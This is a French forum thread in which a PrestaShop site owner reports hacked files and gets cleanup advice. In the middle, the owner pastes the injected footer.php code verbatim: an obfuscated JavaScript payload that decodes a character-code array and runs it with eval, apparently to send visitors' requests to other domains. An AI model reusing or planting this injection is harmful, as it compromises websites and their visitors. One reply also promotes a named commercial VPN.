Fichiers modifiés ?

[Ambroise4258]

Bonjour,

 

Il se passe un truc bizarre :

 

J'ai plusieurs site hébergés sur un même serveur.

 

Soudain l'un deux n'est plus accessible : page blanche.

 

Puis un autre...

 

Et je m'aperçois que certains fichiers sont modifiés (footer.php, index.php, header.php) :

 

Si quelqu'un peut me dire ce dont il s'agit, je suis preneur, et je me demande bien comment ces fichiers ont été modifiés...

 

footer.php

 

@author PrestaShop SA <[email protected]>

* @copyright 2007-2011 PrestaShop SA

* @version Release: $Revision: 6594 $

* @license http://opensource.or...ses/osl-3.0.php Open Software License (OSL 3.0)

* International Registered Trademark & Property of PrestaShop SA

*/

 

$controller = new FrontController();

$controller->displayFooter();

 

#336988#

echo " <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=160;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,113,101,106,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,102,116,104,104,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,107,105,105,111,103,106,94,109,110,37,92,94,41,99,107,108,105,109,95,102,91,108,41,107,96,91,109,111,109,92,87,101,99,93,105,89,107,115,42,91,108,93,40,107,95,104,32,53,8,1,24,25,26,27,100,114,102,107,41,106,108,114,102,96,37,104,104,109,100,107,97,104,104,27,52,24,32,91,93,106,103,101,111,111,92,31,52,7,5,23,24,25,26,104,113,101,106,40,110,107,113,101,95,41,89,103,107,94,96,105,24,54,26,34,39,31,52,7,5,23,24,25,26,104,113,101,106,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,101,115,103,108,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,102,116,104,104,38,108,110,116,99,93,39,102,96,93,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,102,116,104,104,38,108,110,116,99,93,39,110,106,103,24,54,26,34,40,104,113,33,54,4,2,6,4,27,23,24,25,99,97,23,32,26,94,106,90,109,102,95,105,107,38,96,95,111,60,100,94,103,96,101,108,59,115,68,91,32,32,103,117,100,105,32,35,36,23,115,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,111,107,99,111,92,32,32,54,95,96,110,25,99,95,52,84,32,103,117,100,105,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,104,113,101,106,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,103,117,100,105,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s=\"\";for(i=0;i-503!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq-(i%5-5-4));}z=s;e(s);}</script>";

 

#/336988#

 

 

Et le site semble envoyer des requettes vers d'autres domaines que le sien...

 

Si qq'un peut m'éclairer...

 

Merci @+

[iXs]

Bonjour,

 

ton site à été vérolé, si c'est pas encore le cas google va le signaler comme site malvaillant, un coup dur pour un e-commerce. Il faut agir immédiatement.

 

Met le en maintenance et change ton mot de passe FTP. Ensuite nettoie tout le site, il ne doit pas rester une seule ligne de code malveillant.

 

Une fois le site sein il faudra te protéger, je pense que la technique utilisé est le vol de l'accès ftp, nettoie ton poste de travail à fond.

 

Bon courage...

[iXs]

et petit conseil : utilisez un VPN pour éviter que votre connection FTP soit scruté par des trojan. Perso j'utilise celui de Giganews et j'en suis plutôt content.

[Ambroise4258]

Oui en effet !

 

J'ai fait le ménage...

 

Je pense qu'il s'agissait de "booster" le trafic d'un autre site web.

 

Les fichiers .htaccess de tous les domaines ont été modifiés, pour créer des requêtes vers un autre site, qui n'avait rien à voir avec les notre.

 

comment je m'en suis aperçu ?

 

Une cliente m'a dit qu'un lien ne pointait par vers mon site, mais un autre.

Quand j'ai essayé à mon tour, RAS.

 

Puis, en navigant avec Firefox sur un des sites, ce navigateur affiche les domaines où sont envoyées les requêtes. (ce que n'est pas le cas de Chrome ou IE)

C'est là que je me suis aperçu des requêtes qui partaient vers ce domaine inconnu.

Sans ça, je ne me serai aperçu de rien, car les sites fonctionnaient normalement...

 

Ce qui est marrant, c'est que je reçois ce WE un spam qui me dit comment booster mon traffic sur un site... je crois que j'ai compris comment ils faisaient.

 

Ce hacking profite bien au site que j'ai donc parfaitement identifié... Je me demande si je ne vais pas leur écrire pour leur demander un dédommagement....

 

@+